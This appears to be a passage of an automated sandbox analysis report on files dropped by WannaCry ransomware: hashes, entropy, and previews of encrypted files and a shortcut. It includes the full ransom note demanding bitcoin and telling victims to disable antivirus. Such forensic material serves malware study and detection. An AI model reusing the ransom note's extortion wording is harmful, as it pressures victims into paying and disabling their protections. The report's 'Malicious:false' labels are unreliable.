                                                                              Entropy (8bit):7.8187580886556285
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkdXZIVSazF2KoPw7uLYp/A49rc2ni1rUKEaGrkI8vVBFEiTwn:bkdpIcax2KoPywKAenUUK/IAAn
                                                                              MD5:EA66585C673FFEDA3404D298B340A4E7
                                                                              SHA1:9CE1141B734EFF07D7EC9F6D966D3BAF03025B5F
                                                                              SHA-256:DDDBDCDF9211209A7C8514EBF93D11F0F2BA83C1EC1F7C0DBFC4B30D9F9FC5B4
                                                                              SHA-512:71D07A9EC3FDCE6E4C245E1F9C9DC0BFBB54E74718C6DE149D93F07D2BF7AA304D4FA4FBC46432C7EF6CDFA9811C312FA1C735CD59234EAE9B78DF31C73320A5
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....$..t.j|.......?..j.. ..Gb.*r.....^^....9...t.]x...b&.Cw...`...^..m...XF..,.Q..r.J...=.....)Q{ l..F..T9yK.QT.......P.k.... ..-&.@.gg.v{/.O3....;.........B.J';......^of. ......`...J....g....T.t..;.O/..D..e.`8.L.<..cw....*.."...../A.P5..xJ..._X............../...P.T.....83....wtx..M$.....-..My$T.....:...>.......Y..q.N~'k..QR..y..l32.}.G4N:.6...;.....].,P.T.Q.C..(.Nr..-.`......tI.(.d........Ft.'X.iS...{-H..ycT...*.f.../..`...B1.<.W.].......J..W....^q6.(-.'..W.S.....fA/..lc.!...?...S..*3.....y.....t..MV.ZxO....S.......7.<.4d..B..7.".!S.Ev.H5?..7V2...g.f............../T...[X/.j.mN..4.7....*...pr.p....j..4~.=q.%.7....~t.n.+Q....Zx.3...m..c......Pb*Z.;.7....<......8~..*...f&.L.{.J.JhAw....W.AO.).H...@..kM.k.d...,.._....K......:..`.......8&..wG.+&+..k..!=.b^"..W.&F9.r.:F.......d...c.'-......ZU9...`.u...f8(.Eo........j ..E...7._.Y..z............w....7.csuYp.0.Av....3.3.*.....?.cJ."....UR..x.H.f.F6L.......F.<7..h...R.o..?. .c...~-
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.835979521396322
                                                                              Encrypted:false
                                                                              SSDEEP:24:unF0zLJBfZ+FEARxHTfTxkYnVea5YR5d/ov:uneztBfZ+FEAvTyYVea525hov
                                                                              MD5:86BA4868D485FCCE75DA2E021E2D5F35
                                                                              SHA1:35707D912D0BABFE1CACD95F4041063B2778F914
                                                                              SHA-256:96DB35892A507036E03CA54B12C9E20C0DDA7A648379C1AB5474A065682324D0
                                                                              SHA-512:F11ACB2B722243CE18F06AFF142A4213D1EFA1C6E2B6ECE90E1A386E0D8357792F0B7AEBA3B0F09690A2BEF6387FE129C900C3877C444DACBF4F7969D7C26CC1
                                                                              Malicious:false
                                                                              Preview:'..F..X..W....}.qHn....|.T..a..$......cv{Z'F@I.y..=y......[..3...>.t3..t._..c.S.....i....&`...i.[..-....$|........C.2.k..K..nn...O.O..Y......DB<.N...+...V.N......b<.0.K..`D...T.!lv..a..E...z.......l...Re1 ?..C;z|.2....i>.k..}...#?.f.Q]O..J.b.<.m..%../..P.. ...S.....%B.....cn~3$.;1.NV...J,..M..A......x&Y/[..a.|..5.mc....j...B..!....a9.[]p....e..91.yLI........4u..........>@..."..k..^U;..-...Z.&.Q.C....K1|s.N...zFz..q.-.u.X..B.[Z.\....L1.A&kpH..{....Jp..h..k.A..2,..7....1...o.@...`.B...3.G'...w.b...k.#.Na......,l.o..U..Q.pa.=#..;..#F.....N....E.*%....+...r_..(F&r.......{e...AN.180a}.f..t..D...k*...oP....8.....>8.Y.t[.]g7.E[Z..S.;].O....0.:...-.y..[...Q..~TV....w..b...n...g..k..HFf....I.6...*K....J).c.Or...H..w...Tg~...L.eb_.(}...4....G...=.o."....m..|./.A..L.....2..b.....^......,.X...R2...K...?.....[."V;h......7.K..Hn....ay..........#...ai.:UD....U....RF.{.......U....XdU54...@~X.)b.N.{.+.S..Ht.....l.n.`.}.f\p~....?.....|iGg.0..I..<
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.858556225921244
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkNLMhjlNkyDMbzAZUF5hfQckEG0IwfaJtgg3UAqIImxeM79IoHkYuHLmglGO:bkNIpNNk3DhPkEGHMajggFqIIs/7qoHg
                                                                              MD5:0E4E745936992FBB0B9A8228BAD5AB18
                                                                              SHA1:CB94BF6E25CC05F5C2C1B95E5F9C916126787A96
                                                                              SHA-256:37992673EF0C0794B6DCC788F361AA8A21D5B3C4BE0F9F8F3C7181FA30F647C0
                                                                              SHA-512:EDAF0CFE84A6BD555A0BD94D27D29D5CBE4772BCB3E94EA5DF1426801C0BD6E1FD21A2E5B89C0B451BD8BF87FF5BA85AE564436FEAFC2C6A43A446D5604D9125
                                                                              Malicious:false
                                                                              Preview:WANACRY!....u...k...p!..`...p.R.pB/s.F].g...........G..F#.....k3.....^........z.....W~....}.c..B0.7...v*.K...^.2.3/].0*4.....BeC..mc.P......Xg..X.........f.......M........eCc0..F{...<w...y.f.8)^.'....L..^.8B......=.r.R.f..w..6...&..=.Q+....^.._..S/...5............adZ5/V1./......\...U.I(.G..;Wq..45.|X^.p....@... '.e...6.E.F$X....t......Ss;K.. ....w.......@..j...).$..K....K..>.x..O..H....dP.X8........@.....5.8.0=.Z...L...Q.K;k.......:...k.v...u.m.x....2>N.2,..7v2...=.(qC.wpBN....x..GG...0A.#|. ....;..uG|.&.U.(...7..."u....R]..?.K.~..A.....[.....*.hS..Dcw.Z.....Z...<v.qD.`..h.4.p..1..r).....:.>YJu.....c.YJc|hI..l.M.;.P._.!E....j....~..w...\............!c.!..}.lj.H..1..0.+...I...y?{SK....Q!.H"..?.x...a...+..b.[.[<....I.......;...1..".3.B.w...e...5_...DYw&.o|....v..Q...XV....$5...~C....U(....m.....f....k..h.R....J.L...$...~nF.... $)...H...N....C...i..E.9Y.-.=..U..$..;....s./~.4.a.....'.0C....|f..O...t....N..8..!][..t.4<U8.b;..w.. r..$0..a
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.858556225921244
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkNLMhjlNkyDMbzAZUF5hfQckEG0IwfaJtgg3UAqIImxeM79IoHkYuHLmglGO:bkNIpNNk3DhPkEGHMajggFqIIs/7qoHg
                                                                              MD5:0E4E745936992FBB0B9A8228BAD5AB18
                                                                              SHA1:CB94BF6E25CC05F5C2C1B95E5F9C916126787A96
                                                                              SHA-256:37992673EF0C0794B6DCC788F361AA8A21D5B3C4BE0F9F8F3C7181FA30F647C0
                                                                              SHA-512:EDAF0CFE84A6BD555A0BD94D27D29D5CBE4772BCB3E94EA5DF1426801C0BD6E1FD21A2E5B89C0B451BD8BF87FF5BA85AE564436FEAFC2C6A43A446D5604D9125
                                                                              Malicious:false
                                                                              Preview:WANACRY!....u...k...p!..`...p.R.pB/s.F].g...........G..F#.....k3.....^........z.....W~....}.c..B0.7...v*.K...^.2.3/].0*4.....BeC..mc.P......Xg..X.........f.......M........eCc0..F{...<w...y.f.8)^.'....L..^.8B......=.r.R.f..w..6...&..=.Q+....^.._..S/...5............adZ5/V1./......\...U.I(.G..;Wq..45.|X^.p....@... '.e...6.E.F$X....t......Ss;K.. ....w.......@..j...).$..K....K..>.x..O..H....dP.X8........@.....5.8.0=.Z...L...Q.K;k.......:...k.v...u.m.x....2>N.2,..7v2...=.(qC.wpBN....x..GG...0A.#|. ....;..uG|.&.U.(...7..."u....R]..?.K.~..A.....[.....*.hS..Dcw.Z.....Z...<v.qD.`..h.4.p..1..r).....:.>YJu.....c.YJc|hI..l.M.;.P._.!E....j....~..w...\............!c.!..}.lj.H..1..0.+...I...y?{SK....Q!.H"..?.x...a...+..b.[.[<....I.......;...1..".3.B.w...e...5_...DYw&.o|....v..Q...XV....$5...~C....U(....m.....f....k..h.R....J.L...$...~nF.... $)...H...N....C...i..E.9Y.-.=..U..$..;....s./~.4.a.....'.0C....|f..O...t....N..8..!][..t.4<U8.b;..w.. r..$0..a
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:OpenPGP Secret Key
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.798345648377475
                                                                              Encrypted:false
                                                                              SSDEEP:24:c93G4JvJxcBBrhH9V+rqMfWmSjlEC9XoutSaXn:eG4JvKVTV+WdmShPoutP
                                                                              MD5:07B0CBCC09EFCE8993B4EEC2D2EB57B1
                                                                              SHA1:E3DC939B31B8687FBB68CE66FBE4AAF749869FAB
                                                                              SHA-256:09E97CB118F7642DBC8BC30B3791F2AB5ECD6B48314C5BF21A1E01C30C85C13D
                                                                              SHA-512:C8702125638C18C1F157DBE083B9479ECCFCE12F10DFAD8583EFB0C62201D7B5BA3646447708B7B1B03AEC4C1E5ABEBB9ACADB886C4EE25D312CDA26641BD8BA
                                                                              Malicious:false
                                                                              Preview:....5P...}.`.....W....%....'.b.b...B..R.....o.J.....e.A..y..yqf.|PCp....6..H3.o.Gg.G...W...g2....*h..p...;>v...x....np.fW.J...'7wr.O}X..xo.y..3%.....8....~..ZE.M...Dd-NT.F......_V........gas+..}......KH..'C.A..9.d...S.d.D..3.4...>.Nf.....a+._.....~.}.z..N.h..m..0......^..^C_...=.R...Co.e...........7hA..e'..S.-n...E`.X.5..'.Cp.:b.#.._..)....NX].W..5T.9k[..{.j..AB..g.T...j(.s..#..o.o....@T..i...q.....%.....P..y.q!...@@*.i.M./..D.z-...TS.=.&.pA.6..W.1.T....*.'H....Q.../....F...u4.p.> ..8.$_.....#B?#w..w}U....K..[......T..TJV.....j.n.....K..?.?......S....O.;.@..&v7.;{.D"....hD*.E.7S.....X.. .....iv;...4.<....kPk+r#.s...7i......P....1........q.....I@1.z.W.v....kA.Xrj.......;>..%.~".<.8...j.Vq.am#.....c......b%p..A\.N}.L......w...;....U].)...g........jk!?.BG...N....S.>6.*.....!.c....o=Z...g.H.~....N.zeg.wC..o.JXPvD/.c0.....E.Icy(\L+!.T..$H./P6q^.0!upJ....A..Z.Amh^s....|..|.=..v.x.h..>p5..o...+..h.N.{p......1Z.h....>.....|Ej,.w0Z............i.Y
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8426276283487315
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk5QvH9O5mAWAy7mTdTZ9XXfdTZ7wY53cEWQa/ObS5xiMjtG3Lc0PKrj:bk5QvdO5mAhdT7XlW8MEl0jtGA0O
                                                                              MD5:4D06B11B391CFADD2E3AC1EF853B43EF
                                                                              SHA1:B5EB567A44424505CD15A87CC794857BFFF4C7EA
                                                                              SHA-256:D1D40BD00466B83E6238F1BA2C731E55BB6EF48B4F840E5BE9C74F7C8D018B6F
                                                                              SHA-512:D502B0C8ECB0E55A2E87D80499228A99B37980315B623F032CB4F0F756B92503DC09B170DD94AA16A7133FD944DD8CBD8196DC1C057318FB0299604DFBA835B3
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......xg.[d-G..t..#.w...-u.\+:<e..d.Y.......$.. .........H..e..@2....~.y...&?.j..-..x"m.}7&w]..J.z..O.<."...8..g1...:.D.DN...\2..m..F!...A.Lz.....1'm...E8R....|..$9.i>...a..x.P.8+.R(..eQ...>..C..e.....U.%.0Nn...\;V<.z.....n..hB...Z.o...7i..g.x..............2..B....9...lri..@.....L.....m...9.,.l..T..[.SVJ.e4tG.,..wb9..Z..ho.........r....Y...q%&n.^P.T.'?...{v..]lO...w.~.......Lrw.x.`...s(r....2....g(..u8...lz....K.z.......D./PS9..X...`. .g....;.k5!O.k!.....<.]...2w4..S...M(+......X.?W...H.[jmlQ.*....7..uf....%=.&\..M-..p..ne...[x.r7.{|.o.@O.0.<v.........F5.E.k......k.I........;.xP.B...9..;.V...pj....k;................ES..r.......(q...JI.......Q.G*.`<..Y..._B.......J...J.Lw.T.+N.pz.D.R..q./....O..7G-....5'g.)l.J..T.ACD..Ea......^>.."u..U....nc.5.=.D..Ve..`.....+..qA..kw.....g...TP.^.3.......c..&.p..H..8t.$.p...4.....O2.WM%.gX4.{I..9....J..C)(h.%..7...o>5.!.e.9.....Ob/F_. .3.pTS+..K.nDm...h..+. ...@e.DkwFZ.=*...uf_.."..O.q.....&w.n5.J..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8426276283487315
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk5QvH9O5mAWAy7mTdTZ9XXfdTZ7wY53cEWQa/ObS5xiMjtG3Lc0PKrj:bk5QvdO5mAhdT7XlW8MEl0jtGA0O
                                                                              MD5:4D06B11B391CFADD2E3AC1EF853B43EF
                                                                              SHA1:B5EB567A44424505CD15A87CC794857BFFF4C7EA
                                                                              SHA-256:D1D40BD00466B83E6238F1BA2C731E55BB6EF48B4F840E5BE9C74F7C8D018B6F
                                                                              SHA-512:D502B0C8ECB0E55A2E87D80499228A99B37980315B623F032CB4F0F756B92503DC09B170DD94AA16A7133FD944DD8CBD8196DC1C057318FB0299604DFBA835B3
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......xg.[d-G..t..#.w...-u.\+:<e..d.Y.......$.. .........H..e..@2....~.y...&?.j..-..x"m.}7&w]..J.z..O.<."...8..g1...:.D.DN...\2..m..F!...A.Lz.....1'm...E8R....|..$9.i>...a..x.P.8+.R(..eQ...>..C..e.....U.%.0Nn...\;V<.z.....n..hB...Z.o...7i..g.x..............2..B....9...lri..@.....L.....m...9.,.l..T..[.SVJ.e4tG.,..wb9..Z..ho.........r....Y...q%&n.^P.T.'?...{v..]lO...w.~.......Lrw.x.`...s(r....2....g(..u8...lz....K.z.......D./PS9..X...`. .g....;.k5!O.k!.....<.]...2w4..S...M(+......X.?W...H.[jmlQ.*....7..uf....%=.&\..M-..p..ne...[x.r7.{|.o.@O.0.<v.........F5.E.k......k.I........;.xP.B...9..;.V...pj....k;................ES..r.......(q...JI.......Q.G*.`<..Y..._B.......J...J.Lw.T.+N.pz.D.R..q./....O..7G-....5'g.)l.J..T.ACD..Ea......^>.."u..U....nc.5.=.D..Ve..`.....+..qA..kw.....g...TP.^.3.......c..&.p..H..8t.$.p...4.....O2.WM%.gX4.{I..9....J..C)(h.%..7...o>5.!.e.9.....Ob/F_. .3.pTS+..K.nDm...h..+. ...@e.DkwFZ.=*...uf_.."..O.q.....&w.n5.J..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):933
                                                                              Entropy (8bit):4.708686542546707
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                                              MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                                              SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                                              SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                                              SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                                              Malicious:false
                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 4 05:43:20 2024, mtime=Fri Oct 4 05:43:20 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):577
                                                                              Entropy (8bit):5.1553023194242416
                                                                              Encrypted:false
                                                                              SSDEEP:12:81ypzYNbVUthZsUoBjAuvUuHwoOXhicmV:81BImAO96Fm
                                                                              MD5:9B3A32817BC73D079076C7A433BFD223
                                                                              SHA1:ECB0EAF1C2D33A065EAD7E1CC26B1293BB2BC7A7
                                                                              SHA-256:12F9DBE08D1AA086B674A0CFFAD10F11FDC79664CBF5139B9B609D05197228B5
                                                                              SHA-512:CD59012398BA9D25D19F76689222451A32A13D1A79CFEB7B58ED152F121A180CC3A10283ECB32922DA99F162972E0D50CF1C28061D35A11130DFE82B4EAE5702
                                                                              Malicious:false
                                                                              Preview:L..................F.... ......(...c4.(....`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......}}.9....7.(....&..(.....t.2......J.2 .@WANAD~1.EXE..X......DYk5DYk5..............................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........s3.T.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......066656...........hT..CrF.f4... .F..F...../....%..hT..CrF.f4... .F..F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.809661087436381
                                                                              Encrypted:false
                                                                              SSDEEP:24:YN2rrMEqtO+bI2gFscAeTP9riux10pRGcYNszxKgY+CTA4QljpMlu:YArrjqpM/AeJOuxARUKbYlyV2u
                                                                              MD5:930BBDB21EEC1777C280DEC71EB6385A
                                                                              SHA1:B0863A38998CA1C7921FBBECC87233338F1DC14E
                                                                              SHA-256:93DB6143E670419195B7029370747C329CFD678F9FB1D6C9E8C6A8AAD519CE40
                                                                              SHA-512:3E48AB1D3B8609DE2726C2B9E9758ADDC3871CC456A7EF9535FBB2B2934214F237B22F25D2694F02AF288E52224D44B45BB0D0C608E96941E4325B7147642719
                                                                              Malicious:false
                                                                              Preview:!..bE.K.9/.bd0..z.....,}.0....~.......?.^..'.*.P.*+.i.`d...6.2M;#6..C..{..C1..g_'.e.'...(..{.`....9v..cA..d......`_.*%D.`.{....,N....Bn.mn.....@.}.M.2....T)..5.(j..,..S....*...a.]..T.Ro>.....m.P'^..k...o.1.m.Z...`.a........T.6U&k%...n((..R.I..F...K.Py.`..=._.fr.0h..[!K.F_X....d..[.......5...SY1.~.|.o.b+S3...!..:.T.X.h.E .b9......MVk1.i.:s..=Cv.G.....H...h.b6..1.d....TJ....L....A.D.Il.@...G..I....*@s...N.M.ta.."=m3.C........"..h.W..Y[...L...._.yY6y.....|.\...:.Fs.e..E.0.cDen..L...v.OY....aG.P....g4..>fG.....7..8.....(......xNQ........(a.Q*&R... ....i...W.R.................$./4....]=...............F(b........~.s..|..um).i9d.I..w.2..R.3.......S..fn.o....d<....]L.....2..G..,#....Fn.f.....[...@..t.... .t^...)...P.o.]t.b...!_.._.(..#..dI+.......g.m,........z&......O.7.D%.h.,.L. #5.`9.j..(../"+.V.e3!.{`.B.b..U.}. b..........*.o\n.#.,Oua9...B...E....8..UrV.v....n.p..9....~%...%....cQ..\.w....!..s.E.B...:...........Q~.....Dj...z..T.=.....*.GP]
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8550289037305365
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkfXcItGCzwCsvCjT4mk1R/1DmAZN7G+ckyUQoYbkZcj26dhih7GVi1D+7vUHVpp:bkfTdzsqjTO1t1DJIEl7YwZcj26dkN1N
                                                                              MD5:4E61D5ADD9C63F937F533D902F4DB0A0
                                                                              SHA1:982F65B643EF94885042E563AD9386CE0FECBCD1
                                                                              SHA-256:9C736CB1F09D3ACAFE49FBFB369F9963E0751FA18516714117126A4B7AE3B4FB
                                                                              SHA-512:0283349211DBF36A50E27A579A4A8178FD66C3CAA31CD4E7F66E1C56BF1A25B3CE58C4285F7CBF2B39F3891540FC91ABECAFFD576ECFBA2EE342E38C64D464CD
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....O.S......F..q.C..O0Nw..$.a.y.K1.Z./.d..-s...+l...e.........m...H.Q.Ug..G..D.....CU..#.%5...!........\-...I9S.z..^.......H<.t..........LzN=|...f..T..*L..z....~.\..y........^..p?.......F.....$l{|....q..D..]:4......V. .!p...ST.w...F..j..D..N...36t.u............K.......q%.W3/D;.?...n.....1...z.5....S..v_..Q;T..3.?N9....:G...US..^.J.5.J..............s.y[a.z.!.&MS.4....:....n.....%.......F.6F&..6Kg.e]e...(d^..0.*q...X....o]..#.e1..j.8>e0.h.....g..V"#j.3.....S*.*,W.i.........^.ZN.n.vI.BF..l"u....J..|]&@..........^.ll......"......7.4.2....8.~..T.8O...Rw....>3..(0......X.....&.(.C&.4.i..\..H^0........Bk......{..........k.`.T9.a.......V.....)..Hn.......:.{.^..c.X._..;.1.n..%...Zx.%H@.[..........5#..._.....J8..$.}...<:.I..d.....u.H.+g0........h."..2..a..U.E.s.@...O..i[..".R.....i.0Q.....<.U.x/...)h......;u..[{..s.Z.>.\..?.... ..L.z.A...b...Qy...T ....@3...,F31j.^`....s.M..$:d.....:?....tx.6......`Df'#_BU.`{O.@fwiV.30..xg..H..6.B...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8550289037305365
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkfXcItGCzwCsvCjT4mk1R/1DmAZN7G+ckyUQoYbkZcj26dhih7GVi1D+7vUHVpp:bkfTdzsqjTO1t1DJIEl7YwZcj26dkN1N
                                                                              MD5:4E61D5ADD9C63F937F533D902F4DB0A0
                                                                              SHA1:982F65B643EF94885042E563AD9386CE0FECBCD1
                                                                              SHA-256:9C736CB1F09D3ACAFE49FBFB369F9963E0751FA18516714117126A4B7AE3B4FB
                                                                              SHA-512:0283349211DBF36A50E27A579A4A8178FD66C3CAA31CD4E7F66E1C56BF1A25B3CE58C4285F7CBF2B39F3891540FC91ABECAFFD576ECFBA2EE342E38C64D464CD
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....O.S......F..q.C..O0Nw..$.a.y.K1.Z./.d..-s...+l...e.........m...H.Q.Ug..G..D.....CU..#.%5...!........\-...I9S.z..^.......H<.t..........LzN=|...f..T..*L..z....~.\..y........^..p?.......F.....$l{|....q..D..]:4......V. .!p...ST.w...F..j..D..N...36t.u............K.......q%.W3/D;.?...n.....1...z.5....S..v_..Q;T..3.?N9....:G...US..^.J.5.J..............s.y[a.z.!.&MS.4....:....n.....%.......F.6F&..6Kg.e]e...(d^..0.*q...X....o]..#.e1..j.8>e0.h.....g..V"#j.3.....S*.*,W.i.........^.ZN.n.vI.BF..l"u....J..|]&@..........^.ll......"......7.4.2....8.~..T.8O...Rw....>3..(0......X.....&.(.C&.4.i..\..H^0........Bk......{..........k.`.T9.a.......V.....)..Hn.......:.{.^..c.X._..;.1.n..%...Zx.%H@.[..........5#..._.....J8..$.}...<:.I..d.....u.H.+g0........h."..2..a..U.E.s.@...O..i[..".R.....i.0Q.....<.U.x/...)h......;u..[{..s.Z.>.\..?.... ..L.z.A...b...Qy...T ....@3...,F31j.^`....s.M..$:d.....:?....tx.6......`Df'#_BU.`{O.@fwiV.30..xg..H..6.B...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.805365413585998
                                                                              Encrypted:false
                                                                              SSDEEP:24:zx+QkfYScRFrfFvUJcdcmIlLklFasVVSuVV+X8:z8Qkfvc398JkhaszVss
                                                                              MD5:D79FA02A7AE9CF968353E098D72D8FEF
                                                                              SHA1:3F9975A9D692E112A6ABA1D5AEE51FB202719A45
                                                                              SHA-256:BC5FC9886D54D9FA119428F9DAA2F7ADD3A8BC1DA8C50B026D81D73AD020FCFA
                                                                              SHA-512:6C546F3759C3905500394F2259113B66C69F5C34D801308BBF999A94615532CD456D2DCF69AAEF104B4C98F031C4D10F476647519D0FEA44F2B6A5E26920C9D0
                                                                              Malicious:false
                                                                              Preview:.F.2..U\.[.."......:fC..C.z...~].%5b.....6N....i.!..B"...w=.c..h..Y....)N....$...|.)..xu.j...%.O.;.........#.D....g.'.A..9.....P..]_.....-h]{X_W..........G...-....=.W.A./Qm7.h. j.....z..ie......_.I...H.....G....F.~-:.X..Xc..O..T.e..]z.j..R..\.-........e{8...X-M......;...{j.7.1nb|v..........8......h.S.......G)5.:6..Ko.....o!?..c...Trvp..n.z.Jz.Qn..o3%.A.."W.+=}.6..i.......w..:..Q\...x...S..?.U..)%`.f!.w..-...-xuf.V...N.4..0..8k...q...1.5........uv......|<_.11.1.OtS.}.......6.w$#5t..U..;g..:1.<]-.S.y.)n...}.tJ.R!.g..A...p...F.R...B.KN...84>e.V...z...AQg1.c.no....9j...].....d...j.R.Ut+C../..b..N.E.r=(..xo...&.$..=x../.$..z..f....}....bH...W}..W`u..h.O..4-q..10.O.@..!.%dU.a>C%n...).......).BU..Mn.x...=....QM..+..)^...U...t~].{r-..8..OF.1..],uc.u.d.F.....Q6.R.xS...\.;.i2..+#....s|....W.I.[m6@6..y.Wt...Wb..!.s....rP...<\...6r.&M..p..0.x....".gF.m....b... .!.%..CIU.}M._7..y.'.8/.D..M.Hi..y...#....._....J...Q.YA<......D..".y....z.E...:'w...Z..$.X
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.834840574044839
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkv8QOUlxqWkoyM8lhkUE3vWvv6r3UmPE7EgtSCOXxSwmPeIkEdRt:bkv8QOU+RoHOhkUE3vWKTUwE7EgSCskv
                                                                              MD5:45E90A3F51C3CB56C335E65215359685
                                                                              SHA1:C8440880037285B2B9C05FF108799DF7C185F373
                                                                              SHA-256:808F0AC238B2B343EE6889D47AF59F0BC9CB687A40C7A21AB82AAB6EFC3C63D0
                                                                              SHA-512:9CB6EB195C6C07F75243E373F2DE2C3E950155BD8FBD12D4A7248E26DEBAA47F6A797A47FF7C9DF29BE847FE99FD6FA9A181EEC5084BF30B2EB56C829142B26C
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......?......f...v4w.i.x{.,..)T...H..O..._&.(....Cu.e[*..9\...;...........K.......c.M...%..r}..QY..V..\..:G.`[.I.......h....K....F}.....Fkw.=.Pv.M...C6b....2m%z.I~n.^..Q.[$'%..K..*..m.>...*..Gl9.]....n..q1.......~:......y.x....6.....~oy:u{.5.fK...l'...............v-.-.E[..........AO1...[.I....K.!...)!.1)-......3gm..[.^.X....} .+a.z..h........e:...8.......T.L7h..G.{...HRaZ..=.....e....HH(...L .....0.^.Vq.{h..N..E..(.G.P.?...r..@8rM....m..>..-u-M...t.3...%.'....G...z+..Y.....b..ta.../g..I...x^.!.J..b"..y...(VA..s._.....A.6..{a....v....E......O.Rw7..y...8@e@.w.T..A.....;.b..~$.l.Y.W.v.^.!..Ei........&."...??.!I.M0.J.-...a.m......Z?.....W.kekRi...?...9..l.f.~.....N....jz.[..F;bM.Y..Y..{..rL..*R6b.H..I+...z...i.|9u.u....~..AQ.8.L@.zYC$~Z#.[4x.|r@.2...Xd...m).m?.0v._..p.t..`.h..m.A....g9.kq)..mp....n....!.I..p...C......QS?....]/....... .].Fi..X`.f.n.@....!B..W...<......[./......b]....(.`..Hk...\{".!g.sEx..*q#.Y..-.u..dk.v.7.o.... .f...7.Ge.{!
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.834840574044839
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkv8QOUlxqWkoyM8lhkUE3vWvv6r3UmPE7EgtSCOXxSwmPeIkEdRt:bkv8QOU+RoHOhkUE3vWKTUwE7EgSCskv
                                                                              MD5:45E90A3F51C3CB56C335E65215359685
                                                                              SHA1:C8440880037285B2B9C05FF108799DF7C185F373
                                                                              SHA-256:808F0AC238B2B343EE6889D47AF59F0BC9CB687A40C7A21AB82AAB6EFC3C63D0
                                                                              SHA-512:9CB6EB195C6C07F75243E373F2DE2C3E950155BD8FBD12D4A7248E26DEBAA47F6A797A47FF7C9DF29BE847FE99FD6FA9A181EEC5084BF30B2EB56C829142B26C
                                                                              Malicious:false
